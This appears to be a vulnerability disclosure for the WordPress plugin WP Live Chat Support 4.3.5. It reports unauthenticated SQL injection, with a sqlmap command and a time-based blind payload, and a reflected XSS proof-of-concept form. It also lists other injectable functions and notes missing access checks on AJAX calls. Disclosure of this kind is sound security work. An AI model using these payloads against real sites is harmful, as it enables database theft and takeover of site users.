Hello,

Plugin: wp live chat support 4.3.5 

Unauthenticated remote attackers can execute arbitrary SQL commands

1. SQL injection (wplc_update_user_on_page())

Method: POST

Url: http://localhost/wp-content/plugins/wp-live-chat-support/ajax.php

Vulnerable parameters: cid, status

Example PHP callstack:

wplc_update_user_on_page   [/wp-live-chat-support/functions.php:74]

  wpdb::query

Sqlmap verification:

sqlmap --method POST --data "action=wplc_call_to_server_visitor&cid=-1" --dbms mysql -p cid -u http://localhost/wp-content/plugins/wp-live-chat-support/ajax.php

...

Parameter: cid (POST)

    Type: AND/OR time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

    Payload: action=wplc_call_to_server_visitor&cid=-1' AND (SELECT * FROM (SELECT(SLEEP(5)))XGba) AND 'uomP'='uomP

...

2. XSS 

Method: POST

Url: http://localhost/wp-content/plugins/wp-live-chat-support/ajax.php

Vulnerable parameter: wplc_update_admin_chat_table

(json with content type text/html)

Example:

<form action="http://localhost/wp-content/plugins/wp-live-chat-support/ajax.php" method="POST">

<input type="text" name="action" value="wplc_admin_long_poll">

<input type="text" name="wplc_update_admin_chat_table" value="<img src=x onerror='javascript:alert(1);'>">

<input type="submit">

</form>

3. Other SQL injections found in:

wplc_return_chat_status(), 

wplc_return_admin_chat_messages()

wplc_change_chat_status()

wplc_return_chat_session_variable()

wplc_return_user_chat_messages()

wplc_mark_as_read_user_chat_messages()

wplc_return_chat_name()

wplc_return_chat_email()

wplc_user_initiate_chat()

Please also note that there aren't any user level checks for ajax calls (like for wplc_return_admin_chat_messages, wplc_admin_send_msg etc.).